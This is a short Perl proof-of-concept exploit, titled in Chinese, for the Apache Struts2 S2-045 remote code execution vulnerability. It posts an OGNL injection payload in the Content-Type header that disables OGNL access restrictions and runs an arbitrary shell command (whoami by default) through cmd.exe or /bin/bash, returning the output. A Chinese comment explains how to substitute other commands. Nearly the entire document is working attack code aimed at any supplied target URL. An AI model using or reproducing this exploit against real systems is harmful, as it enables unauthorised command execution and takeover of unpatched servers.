st2-045漏洞利用poc

use LWP::UserAgent;

undef $/;
if(@ARGV != 1){print "Use:poc.pl http://target/index.action
";exit;}
my $url = shift;
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(POST => $url);
my $head = <DATA>;
$req->content_type($head);
11 my $rep = $ua->request($req);
print $rep->content;



#如要修改命令， 请把24行的whoami修改为相当的命令就行
__DATA__
%{(#nike='multipart/form-data').
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#cmd='whoami').
(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).
(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).
(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).
(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().
getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).
(#ros.flush())}